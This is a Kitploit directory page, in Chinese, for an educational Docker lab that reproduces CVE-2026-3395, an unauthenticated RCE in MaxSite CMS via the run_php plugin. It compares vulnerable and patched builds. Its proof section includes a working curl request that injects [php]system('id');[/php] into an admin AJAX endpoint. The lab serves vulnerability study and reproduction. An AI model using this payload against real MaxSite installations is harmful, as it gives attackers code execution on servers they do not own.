Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-3395-Lab — 教育性 Docker 实验室,演示 CVE-2026-3395——MaxSite CMS 中通过 run_php 插件实现的无认证远程代码执行(RCE),包含易受攻击和已修补的环境,用于安全复现与分析。 | Kitploit
工具/GitHubGitHub/rootdirective-sec/cve-2026-3395-lab
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubrootdirective-sec/cve-2026-3395-lab

CVE-2026-3395-Lab

教育性 Docker 实验室,演示 CVE-2026-3395——MaxSite CMS 中通过 run_php 插件实现的无认证远程代码执行(RCE),包含易受攻击和已修补的环境,用于安全复现与分析。

查看仓库
15个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-3395 — MaxSite CMS 未认证 RCE 实验环境

本仓库仅用于教育和研究目的。 所有测试必须在本地 Docker 实验环境中进行。 请勿将此配置部署到公共或生产系统。


概述

CVE-2026-3395 影响 MaxSite CMS,允许未认证访问管理 AJAX 端点。当启用 run_php 插件时,用户输入可通过 CMS 钩子系统被作为 PHP 代码执行,这可能导致远程代码执行(RCE)。

本仓库包含:

  • 易受攻击的构建(补丁前提交)
  • 已修补的构建(修复后提交)
  • 用于复现的 Docker 实验环境
  • 安全的影响证明演示

漏洞概述

易受攻击的端点位于:

root@kitploit:~
application/maxsite/admin/plugins/editor_markitup/preview-ajax.php

在易受攻击的版本中:

  • 该端点无需认证即可访问
  • 用户输入(POST data)通过 mso_hook() 传递
  • run_php 插件处理 [php]...[/php] 代码块
  • 该插件使用 eval() 执行包含的代码

如果启用了 run_php,这将导致未认证的远程代码执行。

已修补的版本添加了:

root@kitploit:~
if (!is_login()) die('no login');
mso_checkreferer();

这将访问限制为仅限已认证用户。


Docker 实验环境设置

此实验环境构建两个环境:

环境端口
易受攻击8081
已修补8082

要求

  • Docker
  • Docker Compose v2

1. 构建并启动

root@kitploit:~
docker compose up -d --build

这将:

  • 构建两个镜像
  • 启动数据库
  • 自动运行 CMS 安装程序
  • 在实验环境配置中启用 run_php

2. 验证安装

在浏览器中打开:

root@kitploit:~
http://localhost:8081  (易受攻击)
http://localhost:8082  (已修补)

两个实例都应成功加载。

实验环境运行中


漏洞证明(仅限实验环境)

AJAX 路由使用 base64 编码的路径。

以下内容的 Base64 编码:

root@kitploit:~
admin/plugins/editor_markitup/preview-ajax.php

为:

root@kitploit:~
YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==

易受攻击实例测试

root@kitploit:~
curl -X POST "http://localhost:8081/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8081/" \
  --data-urlencode "data=[php]system('id');[/php]"

易受攻击的 RCE 输出


已修补实例测试

root@kitploit:~
curl -X POST "http://localhost:8082/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
  -H "X-Requested-With: XMLHttpRequest" \
  -H "Referer: http://localhost:8082/" \
  --data-urlencode "data=[php]system('id');[/php]"

预期结果:

root@kitploit:~
no login

已修补的访问控制


停止实验环境

停止容器:

root@kitploit:~
docker compose down -v

免责声明

请仅在隔离环境中将此项目用于研究和学习目的。


参考

  • 公开文章:https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE/
  • VulDB 条目:https://vuldb.com/?submit.762169
  • 官方补丁提交:https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
下载工具